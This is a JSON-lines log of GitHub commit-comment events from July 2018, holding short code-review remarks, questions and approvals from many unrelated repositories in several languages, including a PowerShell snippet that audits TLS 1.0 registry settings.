{"id":"8002217369","type":"CommitCommentEvent","actor":{"login":"Piiit"},"repo":{"name":"idm-suedtirol/bdp-core"},"payload":{"comment":{"id":29796719,"position":98,"line":123,"path":"ws-interface/src/main/java/it/bz/idm/bdp/ws/RestController.java","commit_id":"2d1246ab8ca7f2937c9f34fb2b44e460492436b8","created_at":"2018-07-23T07:41:57Z","updated_at":"2018-07-23T07:41:57Z","author_association":"CONTRIBUTOR","body":"\"timestamp\" refers to an Unix timestamp in milliseconds (not seconds)"}},"created_at":"2018-07-23T07:41:57Z"}
{"id":"8002217389","type":"CommitCommentEvent","actor":{"login":"nitesh405"},"repo":{"name":"Pranila/405-nit"},"payload":{"comment":{"id":29796720,"position":null,"line":null,"path":null,"commit_id":"4ce26d84907abb192e1d4b6ec929f66adde9fc41","created_at":"2018-07-23T07:41:57Z","updated_at":"2018-07-23T07:41:57Z","author_association":"NONE","body":"how to merge this "}},"created_at":"2018-07-23T07:41:57Z"}
{"id":"8002220475","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29796723,"position":44,"line":44,"path":"021/2104.html","commit_id":"31f863f2f9f9b1a5810fde83a9c6dc438721a3ba","created_at":"2018-07-23T07:42:40Z","updated_at":"2018-07-23T07:42:40Z","author_association":"COLLABORATOR","body":"@c-osanai \r\n動き素晴らしいですね！\r\nちょっと意地悪な確認なのですが\r\nこのwhenというのはどのような動きをするのか説明できますでしょうか。"}},"created_at":"2018-07-23T07:42:40Z"}
{"id":"8002220569","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29796724,"position":15,"line":21,"path":"src/DebugDrawer.java","commit_id":"372a3ef65a942f8d49b8d44e4a41a593877c3096","created_at":"2018-07-23T07:42:41Z","updated_at":"2018-07-23T07:42:41Z","author_association":"CONTRIBUTOR","body":"The boxes need to be updated every frame and that would involve removing all `DebugBox` objects and recreating them. To keep things simple, it may be better to make `DebugDrawer` the `Drawable` object and call `drawRect` for each fixture from there."}},"created_at":"2018-07-23T07:42:41Z"}
{"id":"8002222108","type":"CommitCommentEvent","actor":{"login":"ariessurvivor"},"repo":{"name":"willtemperley/smart-fire"},"payload":{"comment":{"id":29796729,"position":null,"line":null,"path":null,"commit_id":"41117da22cfd1bf925f65c459845223888c044cf","created_at":"2018-07-23T07:43:03Z","updated_at":"2018-07-23T07:43:03Z","author_association":"NONE","body":"Do you have a plan to update this plugins for SMART 5.01 or 6?\r\n\r\nI think this is a very good plugins."}},"created_at":"2018-07-23T07:43:03Z"}
{"id":"8002224364","type":"CommitCommentEvent","actor":{"login":"bealex"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29796734,"position":3,"line":2,"path":"HowMuch/Code/Presentation/Groups/Cells/FourMembers/FourMembersCell.swift","commit_id":"af4d61a6858276d02801a70e6574b0d567a357a0","created_at":"2018-07-23T07:43:35Z","updated_at":"2018-07-23T07:43:35Z","author_association":"COLLABORATOR","body":"Точка пропала :("}},"created_at":"2018-07-23T07:43:35Z"}
{"id":"8002228993","type":"CommitCommentEvent","actor":{"login":"bealex"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29796744,"position":140,"line":93,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/GroupListViewController.swift","commit_id":"af4d61a6858276d02801a70e6574b0d567a357a0","created_at":"2018-07-23T07:44:39Z","updated_at":"2018-07-23T07:44:39Z","author_association":"COLLABORATOR","body":"А если их будет десять?"}},"created_at":"2018-07-23T07:44:39Z"}
{"id":"8002231423","type":"CommitCommentEvent","actor":{"login":"bealex"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29796750,"position":11,"line":11,"path":"HowMuch/Code/Services/PersonDataService.swift","commit_id":"af4d61a6858276d02801a70e6574b0d567a357a0","created_at":"2018-07-23T07:45:11Z","updated_at":"2018-07-23T07:45:11Z","author_association":"COLLABORATOR","body":"Давай сделаем сохранение, хотя бы пока в UserDefaults."}},"created_at":"2018-07-23T07:45:11Z"}
{"id":"8002235752","type":"CommitCommentEvent","actor":{"login":"Rann678"},"repo":{"name":"Rann678/Telenor"},"payload":{"comment":{"id":29796764,"position":null,"line":null,"path":null,"commit_id":"7ca0a3859546aa0b163c3e109b274136b3923606","created_at":"2018-07-23T07:46:13Z","updated_at":"2018-07-23T07:46:13Z","author_association":"OWNER","body":"nor woking"}},"created_at":"2018-07-23T07:46:13Z"}
{"id":"8002244293","type":"CommitCommentEvent","actor":{"login":"sai358"},"repo":{"name":"sai358/Struts2Example"},"payload":{"comment":{"id":29796802,"position":null,"line":null,"path":null,"commit_id":"f76e80f5a6e374604195653dd5e6e72e67ab6d9a","created_at":"2018-07-23T07:48:08Z","updated_at":"2018-07-23T07:48:08Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-23T07:48:08Z"}
{"id":"8002245862","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29796805,"position":null,"line":null,"path":null,"commit_id":"d775cca5a9dd2cfafdc4f9e8ab1d2849eea3495e","created_at":"2018-07-23T07:48:30Z","updated_at":"2018-07-23T07:48:30Z","author_association":"NONE","body":"What happens with the 16-cores machines of the VLTC test? I see lots of losses on time:\r\nhttp://tests.stockfishchess.org/tests/view/5b550b790ebc5902bdb84466\r\n\r\n@noobpwnftw : are the 16-cores machines still affected by the Ryzen bug?\r\n\r\n@locutus2 : please don't stop the test right now (if anything put it at priority -1), for I would like to have this losses on time sorted out and they would disappear from the list if the test is purged."}},"created_at":"2018-07-23T07:48:30Z"}
{"id":"8002257717","type":"CommitCommentEvent","actor":{"login":"galshachaf"},"repo":{"name":"Mellanox/qemu"},"payload":{"comment":{"id":29796819,"position":null,"line":null,"path":null,"commit_id":"c975a3e20da20989f6cd2291196ae69a63618afd","created_at":"2018-07-23T07:51:12Z","updated_at":"2018-07-23T07:51:12Z","author_association":"NONE","body":"1. I'm ok with this commit. looks good.\r\n2. I think that since the RDMA control channel is used for the non-RAM parts of the machine, this patch should be applied to all RDMA migrations, and not only post copy."}},"created_at":"2018-07-23T07:51:12Z"}
{"id":"8002258650","type":"CommitCommentEvent","actor":{"login":"libliang17"},"repo":{"name":"zhejiangxiaomai/mariadb-connector-j"},"payload":{"comment":{"id":29796821,"position":14,"line":114,"path":"src/main/java/org/mariadb/jdbc/MariaDbConnection.java","commit_id":"4b7045a22883178648e93f28c54af2901aec9202","created_at":"2018-07-23T07:51:24Z","updated_at":"2018-07-23T07:51:24Z","author_association":"NONE","body":"please consider to use concurrentHashMap"}},"created_at":"2018-07-23T07:51:24Z"}
{"id":"8002260190","type":"CommitCommentEvent","actor":{"login":"turtle321"},"repo":{"name":"puntonim/py-service-orcid"},"payload":{"comment":{"id":29796825,"position":null,"line":null,"path":null,"commit_id":"98d9784b9e2660173ed6f420ef0157a1ba9f0bf3","created_at":"2018-07-23T07:51:46Z","updated_at":"2018-07-23T07:51:46Z","author_association":"NONE","body":"I wonder if `inspirehep-service-orcid` would be a better name for the PyPi package"}},"created_at":"2018-07-23T07:51:46Z"}
{"id":"8002266065","type":"CommitCommentEvent","actor":{"login":"timogoudzwaard"},"repo":{"name":"timogoudzwaard/Arcatering-App"},"payload":{"comment":{"id":29796844,"position":null,"line":null,"path":null,"commit_id":"61759420c0051ed12726bd39b04c472edcddde46","created_at":"2018-07-23T07:53:07Z","updated_at":"2018-07-23T07:53:07Z","author_association":"OWNER","body":"#2 "}},"created_at":"2018-07-23T07:53:07Z"}
{"id":"8002266466","type":"CommitCommentEvent","actor":{"login":"timogoudzwaard"},"repo":{"name":"timogoudzwaard/Arcatering-App"},"payload":{"comment":{"id":29796846,"position":null,"line":null,"path":null,"commit_id":"d97889396c3f7f057567b29432f0dec8e8af0a90","created_at":"2018-07-23T07:53:12Z","updated_at":"2018-07-23T07:53:12Z","author_association":"OWNER","body":"#2 "}},"created_at":"2018-07-23T07:53:12Z"}
{"id":"8002266813","type":"CommitCommentEvent","actor":{"login":"timogoudzwaard"},"repo":{"name":"timogoudzwaard/Arcatering-App"},"payload":{"comment":{"id":29796847,"position":null,"line":null,"path":null,"commit_id":"acee8b936ab5285ebe3e4cf02275ceeff65e170f","created_at":"2018-07-23T07:53:18Z","updated_at":"2018-07-23T07:53:18Z","author_association":"OWNER","body":"#2 "}},"created_at":"2018-07-23T07:53:18Z"}
{"id":"8002279784","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29796867,"position":13,"line":5,"path":"2/Task3.rb","commit_id":"340c746762997fdc1dd3e7cfe303f5b1ba3c30db","created_at":"2018-07-23T07:56:15Z","updated_at":"2018-07-23T07:56:15Z","author_association":"NONE","body":"while true это тоже самое что и loop do по сути\r\nВместо true должно быть реальное условие (которое у тебя используется в break)\r\nИспользовать бесконечный цикл (loop do, while true) плохая практика, из-за того что вероятность получить зацикливание выше"}},"created_at":"2018-07-23T07:56:15Z"}
{"id":"8002280496","type":"CommitCommentEvent","actor":{"login":"yoosiba"},"repo":{"name":"eclipse/n4js"},"payload":{"comment":{"id":29796873,"position":42,"line":42,"path":"tests/org.eclipse.n4js.transpiler.tests/pom.xml","commit_id":"d064326cf66d58ccfdfe8c30bfafcd0ace505c7b","created_at":"2018-07-23T07:56:25Z","updated_at":"2018-07-23T07:56:25Z","author_association":"CONTRIBUTOR","body":"that seems odd, often indicates misconfiguration of dependencies.\r\nOr this might be obsolete, `org.eclipse.n4js.transpiler.es5.tests` is not using this approach."}},"created_at":"2018-07-23T07:56:25Z"}
{"id":"8002281531","type":"CommitCommentEvent","actor":{"login":"goldnigunigu"},"repo":{"name":"goldnigunigu/hello-world"},"payload":{"comment":{"id":29796874,"position":null,"line":null,"path":null,"commit_id":"29fc902d3319cf98210d564a663d968a6f7e5fbc","created_at":"2018-07-23T07:56:38Z","updated_at":"2018-07-23T07:56:38Z","author_association":"OWNER","body":"first  program  on github."}},"created_at":"2018-07-23T07:56:38Z"}
{"id":"8002281780","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29796875,"position":null,"line":null,"path":null,"commit_id":"84ab825e41126c1954b714b245f45e3072878dea","created_at":"2018-07-23T07:56:41Z","updated_at":"2018-07-23T07:56:41Z","author_association":"MEMBER","body":"Looks good to me :+1: "}},"created_at":"2018-07-23T07:56:41Z"}
{"id":"8002283798","type":"CommitCommentEvent","actor":{"login":"nemosminer"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29796880,"position":null,"line":null,"path":null,"commit_id":"c14d3fa6c837cdfef3360d62d4e6ea64da5c626b","created_at":"2018-07-23T07:57:09Z","updated_at":"2018-07-23T07:57:09Z","author_association":"OWNER","body":"try now : ) patience is a virtue "}},"created_at":"2018-07-23T07:57:09Z"}
{"id":"8002290700","type":"CommitCommentEvent","actor":{"login":"libliang17"},"repo":{"name":"zhejiangxiaomai/mariadb-connector-j"},"payload":{"comment":{"id":29796898,"position":24,"line":155,"path":"src/main/java/org/mariadb/jdbc/MariaDbConnection.java","commit_id":"4b7045a22883178648e93f28c54af2901aec9202","created_at":"2018-07-23T07:58:35Z","updated_at":"2018-07-23T07:58:35Z","author_association":"NONE","body":"please consider the following case 192.168.264.12   3306   vs   192.168.264.123  306 ;   suggest to use some seperator"}},"created_at":"2018-07-23T07:58:35Z"}
{"id":"8002296503","type":"CommitCommentEvent","actor":{"login":"tomasbedrich"},"repo":{"name":"PyMySQL/PyMySQL"},"payload":{"comment":{"id":29796901,"position":null,"line":null,"path":null,"commit_id":"99f4720f446463721d68c29f52d97cb01dbf0c3f","created_at":"2018-07-23T07:59:51Z","updated_at":"2018-07-23T07:59:51Z","author_association":"NONE","body":"Hello @methane, can I kindly propose adding a tag and a changelog note please?"}},"created_at":"2018-07-23T07:59:51Z"}
{"id":"8002297441","type":"CommitCommentEvent","actor":{"login":"274188A"},"repo":{"name":"fbprogmbh/Audit-Test-Automation"},"payload":{"comment":{"id":29796904,"position":null,"line":null,"path":null,"commit_id":"e021a382674d9a1fca4b0610d0fb7463c9fe210a","created_at":"2018-07-23T08:00:04Z","updated_at":"2018-07-23T08:00:04Z","author_association":"NONE","body":"line 2164 (#7.4)\r\nWindows 2016 Datacenter has a 'DisabledByDefault' key which can be checked:\r\n\r\n\r\n```\r\n# TLS 1.0 is enabled by default\r\n    if (Test-Path $path) {\r\n        # Ensure the following key exists\r\n        $Key = Get-Item $path\r\n        if ($null -ne $Key.GetValue(\"Enabled\", $null)) {\r\n            $value = Get-ItemProperty $path | Select-Object -ExpandProperty \"Enabled\"\r\n            # Ensure it is set to 0\r\n            if ($value -eq 0) {\r\n                $message = $MESSAGE_ALLGOOD\r\n                $audit = [AuditStatus]::True\r\n            }\r\n        }\r\n        elseif ($null -ne $Key.GetValue(\"DisabledByDefault\", $null)) {\r\n            $value = Get-ItemProperty $path | Select-Object -ExpandProperty \"DisabledByDefault\"\r\n            # Ensure it is set to 1\r\n            if ($value -eq 1) {\r\n                $message = $MESSAGE_ALLGOOD\r\n                $audit = [AuditStatus]::True\r\n            }\r\n        }\r\n    }\r\n```"}},"created_at":"2018-07-23T08:00:04Z"}
{"id":"8002304372","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"angrenkov/courses"},"payload":{"comment":{"id":29796915,"position":47,"line":34,"path":"clockjs.js","commit_id":"350412354b25db19bea7701128e9ee42fdd35968","created_at":"2018-07-23T08:01:30Z","updated_at":"2018-07-23T08:01:30Z","author_association":"COLLABORATOR","body":"Тернарные операторы для читаемости лучше разделяй так:\r\nlet tMin = !d\r\n    ? ....\r\n     : ....\r\n\r\nИ перед знаками \"?\" и \":\" ставь отступ в один таб (просто гитхаб их съедает)"}},"created_at":"2018-07-23T08:01:30Z"}
{"id":"8002304996","type":"CommitCommentEvent","actor":{"login":"tamuraryo0126"},"repo":{"name":"hairdorabirth/weblio"},"payload":{"comment":{"id":29796916,"position":8,"line":12,"path":"qfromw/templates/input.html","commit_id":"ef52e03b7790992df594f66d45c1e7b7a84e3300","created_at":"2018-07-23T08:01:37Z","updated_at":"2018-07-23T08:01:37Z","author_association":"COLLABORATOR","body":"ここに時間を表示できるようにしました"}},"created_at":"2018-07-23T08:01:37Z"}
{"id":"8002306320","type":"CommitCommentEvent","actor":{"login":"tamuraryo0126"},"repo":{"name":"hairdorabirth/weblio"},"payload":{"comment":{"id":29796918,"position":8,"line":12,"path":"qfromw/templates/input.html","commit_id":"ef52e03b7790992df594f66d45c1e7b7a84e3300","created_at":"2018-07-23T08:01:55Z","updated_at":"2018-07-23T08:01:55Z","author_association":"COLLABORATOR","body":"ええぞ\r\n"}},"created_at":"2018-07-23T08:01:55Z"}
{"id":"8002309033","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"angrenkov/courses"},"payload":{"comment":{"id":29796920,"position":137,"line":104,"path":"clockjs.js","commit_id":"350412354b25db19bea7701128e9ee42fdd35968","created_at":"2018-07-23T08:02:31Z","updated_at":"2018-07-23T08:02:31Z","author_association":"COLLABORATOR","body":"Это можно сократить до if (!new Date().getSeconds()) {...}"}},"created_at":"2018-07-23T08:02:31Z"}
{"id":"8002310794","type":"CommitCommentEvent","actor":{"login":"gph82"},"repo":{"name":"arose/nglview"},"payload":{"comment":{"id":29796925,"position":null,"line":null,"path":null,"commit_id":"98b8ce78f3669273c0fd06632a4894d4d1f75d5b","created_at":"2018-07-23T08:02:55Z","updated_at":"2018-07-23T08:02:55Z","author_association":"NONE","body":"great news "}},"created_at":"2018-07-23T08:02:55Z"}
{"id":"8002311228","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"angrenkov/courses"},"payload":{"comment":{"id":29796926,"position":141,"line":108,"path":"clockjs.js","commit_id":"350412354b25db19bea7701128e9ee42fdd35968","created_at":"2018-07-23T08:03:00Z","updated_at":"2018-07-23T08:03:00Z","author_association":"COLLABORATOR","body":"Тоже самое, можно сократить до if (!m)"}},"created_at":"2018-07-23T08:03:00Z"}
{"id":"8002311692","type":"CommitCommentEvent","actor":{"login":"n18022"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29796928,"position":null,"line":null,"path":null,"commit_id":"e62f16694f7b616d6dc6229b670f97b5beec9e88","created_at":"2018-07-23T08:03:06Z","updated_at":"2018-07-23T08:03:06Z","author_association":"OWNER","body":"先生の助言を聞いて完成させました。ありがとうございます！\r\n\r\n2018年7月22日 18:29 kinjo-icolle <notifications@github.com>:\r\n\r\n> オプション端折られてるので一応全部入れてあげてくださいね〜^^;\r\n>\r\n> まず、本題とはちょっと関係ない部分ですが、変数の話を。\r\n> 変数ですが、あんまり大文字で始めるのはどの言語でも好ましくありません。\r\n> Order_contentはorder_contentにしたほうがいいと思います。\r\n>\r\n> また、単語単位は区切った方がいいですね。\r\n> メインメニューはmain_menuとか。で、辞書型で複数の値を管理するので、僕は複数とわかるようにmain_menusとsをつけました。\r\n> あくまで参考まで。\r\n>\r\n> で、本題として機能を満たすソースの部分ですが、注文内容の表示部分でメインメニューしか出ていないです。(22行目)\r\n> 注文内容を格納しているリストはorder_contentのはずなので、それを表示すればよいでしょう。\r\n> また、合計金額が表示されていないです。それを算出するための変数を用意し、合計を出力してあげましょう。\r\n>\r\n> あとはまた変数の部分になってしまいますが。\r\n> オプションを注文する部分の継続条件に出て来るEnd変数。\r\n> これは、11,16行目で代入されているので、19行目では必ず何かしら値が入っている状態にはなります。\r\n> が、あんまりこの形は美しくないですね。\r\n>\r\n> 19行目で使いたい場合、一旦は最初のwhileの前に宣言しておくと、確実に未定義エラーが起こらないので、そうするのが良いと僕は思います。\r\n>\r\n> また、僕がヒントで与えたis_option_orderingですが、思ったのと違う使い方してるかな^^;\r\n> 直訳すると「今オプションをオーダーしている最中かどうか」と言った意味になり、実際にこのコードを見ると「\r\n> 注文したオプションメニューの名称」が代入されています。\r\n> この場合は、\"ordered_option\"(注文されたオプション)とかにするといいかなと思います。\r\n>\r\n> 変数には「こいつは何者なのか」が第三者からみて分かる名前にするといいと思います。\r\n>\r\n> 最後に、ちょっと細かいですが、再三話しているとおり、空白行がないので、このコードの「段落」が捉えにくいです。\r\n> 小説の目次風に言うと、\r\n> 「変数を準備する(エピローグ)」「メインメニューを注文する」「オプションメニューを注文する」\r\n> といった段落に分かれると思います。その間に空白行を入れると良いと思います。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/n18022/programming-term2/commit/e62f16694f7b616d6dc6229b670f97b5beec9e88#commitcomment-29791770>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AldxpSdMdHSym99TlN-_i742BLu2gMDqks5uJEXegaJpZM4VZ7f6>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-23T08:03:06Z"}
{"id":"8002315479","type":"CommitCommentEvent","actor":{"login":"simos"},"repo":{"name":"scottgreenup/lolcat"},"payload":{"comment":{"id":29796938,"position":null,"line":null,"path":null,"commit_id":"e298c102bd51ae67fbae09df5dfc00cba16a2231","created_at":"2018-07-23T08:03:59Z","updated_at":"2018-07-23T08:03:59Z","author_association":"NONE","body":"Hi!\r\n\r\nWould you like to take over the `lolcat-c` snap package so that you can add updates and manage the snap?\r\nHere is the current page of the snap, https://snapcraft.io/lolcat-c\r\nA request to change ownership looks like this, https://forum.snapcraft.io/t/change-ownership-of-notepadqq/4113\r\n\r\nNew snap package management features that you can use, include:\r\n1. Ability to use the build servers to build `lolcat-c` for amd64, i386, armhf and arm64.\r\n2. Ability to autobuild `lolcat-c` automatically as soon as you commit a change.\r\n3. Ability to make a release from the web interface, without the need to command line.\r\n"}},"created_at":"2018-07-23T08:03:59Z"}
{"id":"8002319645","type":"CommitCommentEvent","actor":{"login":"florent-lamiraux"},"repo":{"name":"stack-of-tasks/pinocchio"},"payload":{"comment":{"id":29796940,"position":null,"line":null,"path":null,"commit_id":"a0af3a193a867f0e9c6d8305f29e8b88634cd278","created_at":"2018-07-23T08:04:58Z","updated_at":"2018-07-23T08:04:58Z","author_association":"MEMBER","body":"When renaming a header file, it is good practise to leave the old header as a deprecated one using directive\r\n#warning: \"This file is deprecated: use .... instead.\""}},"created_at":"2018-07-23T08:04:58Z"}
{"id":"8002319705","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"angrenkov/courses"},"payload":{"comment":{"id":29796941,"position":null,"line":null,"path":null,"commit_id":"350412354b25db19bea7701128e9ee42fdd35968","created_at":"2018-07-23T08:04:58Z","updated_at":"2018-07-23T08:04:58Z","author_association":"COLLABORATOR","body":"Все окей, мелкие косяки. Только файлы типа vcs.xml добавляй в gitignore, чтобы они не висели в гите. \r\nИ файлы лучше именовать не clockhtml.html, clockcss.css, а index.html, styles.css (или main.css, global.css)."}},"created_at":"2018-07-23T08:04:58Z"}
{"id":"8002320302","type":"CommitCommentEvent","actor":{"login":"peppaintelligence"},"repo":{"name":"suyan/suyan.github.io"},"payload":{"comment":{"id":29796942,"position":null,"line":null,"path":null,"commit_id":"ebf7069445b5f7caa5338e0190b3d16dc189003d","created_at":"2018-07-23T08:05:07Z","updated_at":"2018-07-23T08:05:07Z","author_association":"NONE","body":"opps"}},"created_at":"2018-07-23T08:05:07Z"}
{"id":"8002320721","type":"CommitCommentEvent","actor":{"login":"martinohanlon"},"repo":{"name":"raspberrypilearning/shapes"},"payload":{"comment":{"id":29796944,"position":null,"line":null,"path":null,"commit_id":"7c9452d58700e600ff70b4359f441d03d962fbb5","created_at":"2018-07-23T08:05:12Z","updated_at":"2018-07-23T08:05:12Z","author_association":"MEMBER","body":"@17VB I replied to your comment on futurelearn.\r\n\r\n\"\"\"\r\n@VilasBhoge Hi Vilas. The error \"No Module Named 'Shapes'\" is telling you that it cant find the shapes.py file - did you download it? If so, it must be in the same folder as your my_drawing.py file.\r\n\"\"\""}},"created_at":"2018-07-23T08:05:12Z"}
{"id":"8002321976","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"angrenkov/courses"},"payload":{"comment":{"id":29796949,"position":null,"line":null,"path":null,"commit_id":"350412354b25db19bea7701128e9ee42fdd35968","created_at":"2018-07-23T08:05:29Z","updated_at":"2018-07-23T08:05:29Z","author_association":"COLLABORATOR","body":"P.S. И забыл про установку секунд"}},"created_at":"2018-07-23T08:05:29Z"}
{"id":"8002322717","type":"CommitCommentEvent","actor":{"login":"QQcreation"},"repo":{"name":"QQcreation/eric"},"payload":{"comment":{"id":29796951,"position":null,"line":null,"path":null,"commit_id":"9020256aca05159c066b99d01cf2723968cbc79c","created_at":"2018-07-23T08:05:39Z","updated_at":"2018-07-23T08:05:39Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-23T08:05:39Z"}
{"id":"8002323704","type":"CommitCommentEvent","actor":{"login":"mdigital85"},"repo":{"name":"Shivom007/kernel-source-code-LYF-Water-7"},"payload":{"comment":{"id":29796952,"position":null,"line":null,"path":null,"commit_id":"e693927ae4d54683480a7e7416e8e53faafe660b","created_at":"2018-07-23T08:05:52Z","updated_at":"2018-07-23T08:05:52Z","author_association":"NONE","body":"Bhai Lyf Ka Source code aapne kese banaya...pls help "}},"created_at":"2018-07-23T08:05:52Z"}
{"id":"8002324323","type":"CommitCommentEvent","actor":{"login":"kurtwall"},"repo":{"name":"mercycorps/TolaActivity"},"payload":{"comment":{"id":29796954,"position":5,"line":24,"path":".gitignore","commit_id":"2b180a3d339a5e15f558f74087f5cff947c1b59e","created_at":"2018-07-23T08:06:01Z","updated_at":"2018-07-23T08:06:01Z","author_association":"COLLABORATOR","body":"My bad. At the time I _.gitignore_d this, I knew very little about NPM and JS package management. I think my rationale was something like, \"The test suite is under heavy development, I'm adding/removing/updating packages a lot, so save the git churn.\" By the time the churn settled, I'd forgotten all about the _.gitignore_ entry."}},"created_at":"2018-07-23T08:06:01Z"}
{"id":"8002325739","type":"CommitCommentEvent","actor":{"login":"ksatchit"},"repo":{"name":"kmova/k8s-charts"},"payload":{"comment":{"id":29796955,"position":null,"line":null,"path":null,"commit_id":"f5f7cdff32f63108e0c3d30bef54494d4d9c67d0","created_at":"2018-07-23T08:06:20Z","updated_at":"2018-07-23T08:06:20Z","author_association":"NONE","body":"LGTM"}},"created_at":"2018-07-23T08:06:20Z"}
{"id":"8002327424","type":"CommitCommentEvent","actor":{"login":"ascherer"},"repo":{"name":"ascherer/cwebtest"},"payload":{"comment":{"id":29796957,"position":null,"line":null,"path":null,"commit_id":"1c5f1775705b40774c8921d4136ac1f52f86e4b5","created_at":"2018-07-23T08:06:44Z","updated_at":"2018-07-23T08:06:44Z","author_association":"OWNER","body":"[OMG, this is f-ing terrifying!](https://twitter.com/colbertlateshow/status/1017617257114030080) `getopt --long` only works withthe **Linux** variant, so this extension breaks on BSD and MacOS."}},"created_at":"2018-07-23T08:06:44Z"}
{"id":"8002329851","type":"CommitCommentEvent","actor":{"login":"rapotek"},"repo":{"name":"opencaching/opencaching-pl"},"payload":{"comment":{"id":29796959,"position":null,"line":null,"path":null,"commit_id":"27498b40578774973dc5952a37d2f73c8828a801","created_at":"2018-07-23T08:07:17Z","updated_at":"2018-07-23T08:07:17Z","author_association":"CONTRIBUTOR","body":"Checked in my development environment, seems to be correct."}},"created_at":"2018-07-23T08:07:17Z"}
{"id":"8002338806","type":"CommitCommentEvent","actor":{"login":"hassano16007"},"repo":{"name":"hassano16007/my_testgithub"},"payload":{"comment":{"id":29796965,"position":null,"line":null,"path":null,"commit_id":"09f72158fe7c87987edf9e2e1818dd23ebef1dd3","created_at":"2018-07-23T08:09:17Z","updated_at":"2018-07-23T08:09:17Z","author_association":"OWNER","body":"Checkout230761"}},"created_at":"2018-07-23T08:09:17Z"}
{"id":"8002353365","type":"CommitCommentEvent","actor":{"login":"coral-LJ"},"repo":{"name":"coral-LJ/Learning-Python"},"payload":{"comment":{"id":29796989,"position":null,"line":null,"path":null,"commit_id":"2076afbb4b0de9eadc5fa959b5e832332a0bab45","created_at":"2018-07-23T08:12:31Z","updated_at":"2018-07-23T08:12:31Z","author_association":"OWNER","body":"test case of excel used to be changed html,it's be imported in xmind"}},"created_at":"2018-07-23T08:12:31Z"}
{"id":"8002356612","type":"CommitCommentEvent","actor":{"login":"oliveris"},"repo":{"name":"oliveris/laravel-stackdriver"},"payload":{"comment":{"id":29796995,"position":null,"line":null,"path":null,"commit_id":"9fcc402c670f78aa17c39a1c676508074beba2d0","created_at":"2018-07-23T08:13:14Z","updated_at":"2018-07-23T08:13:14Z","author_association":"OWNER","body":"Throws an exception when HTTP_HOST cannot be resolved, for example errors from a command triggered through the crontab.\r\nThis should fix it."}},"created_at":"2018-07-23T08:13:14Z"}
{"id":"8002358825","type":"CommitCommentEvent","actor":{"login":"corlinus"},"repo":{"name":"Paullsam/Test-teach"},"payload":{"comment":{"id":29796998,"position":52,"line":48,"path":"figures/lib/figures_collection.rb","commit_id":"af956923f2f0098b3848be7e9f9a0a060e1b7453","created_at":"2018-07-23T08:13:43Z","updated_at":"2018-07-23T08:13:43Z","author_association":"COLLABORATOR","body":"название метода не очень. я бы сказал create_collection."}},"created_at":"2018-07-23T08:13:43Z"}
{"id":"8002360329","type":"CommitCommentEvent","actor":{"login":"MojiRiAnt"},"repo":{"name":"D34DStone/JITServer"},"payload":{"comment":{"id":29797000,"position":null,"line":null,"path":null,"commit_id":"4848d60c2f137ebfa516a78977b055c3461c0a58","created_at":"2018-07-23T08:14:02Z","updated_at":"2018-07-23T08:14:02Z","author_association":"COLLABORATOR","body":"Notice that I didn't delete it (as it says 'do_not_delete') - I removed it."}},"created_at":"2018-07-23T08:14:02Z"}
{"id":"8002361374","type":"CommitCommentEvent","actor":{"login":"barankaplan7878"},"repo":{"name":"MrCrayfish/MrCrayfishFurnitureMod"},"payload":{"comment":{"id":29797001,"position":null,"line":null,"path":null,"commit_id":"dfe69d81c212f2c36817ddfc326a16283842d3ea","created_at":"2018-07-23T08:14:16Z","updated_at":"2018-07-23T08:14:16Z","author_association":"NONE","body":"@MrCrayfish What should I do to make it working on my server?"}},"created_at":"2018-07-23T08:14:16Z"}
{"id":"8002369752","type":"CommitCommentEvent","actor":{"login":"sujinleeme"},"repo":{"name":"the-road-to-learn-react/the-road-to-learn-react-korean"},"payload":{"comment":{"id":29797040,"position":5,"line":66,"path":"manuscript/chapter1.md","commit_id":"580a4c87626a88e1b0d353dd5b824b75727aefc0","created_at":"2018-07-23T08:16:06Z","updated_at":"2018-07-23T08:16:06Z","author_association":"MEMBER","body":"패키지 이름"}},"created_at":"2018-07-23T08:16:06Z"}
{"id":"8002370342","type":"CommitCommentEvent","actor":{"login":"libliang17"},"repo":{"name":"zhejiangxiaomai/mariadb-connector-j"},"payload":{"comment":{"id":29797042,"position":106,"line":761,"path":"src/main/java/org/mariadb/jdbc/internal/protocol/AbstractConnectProtocol.java","commit_id":"4b7045a22883178648e93f28c54af2901aec9202","created_at":"2018-07-23T08:16:14Z","updated_at":"2018-07-23T08:16:14Z","author_association":"NONE","body":"please use Camel-Case naming"}},"created_at":"2018-07-23T08:16:14Z"}
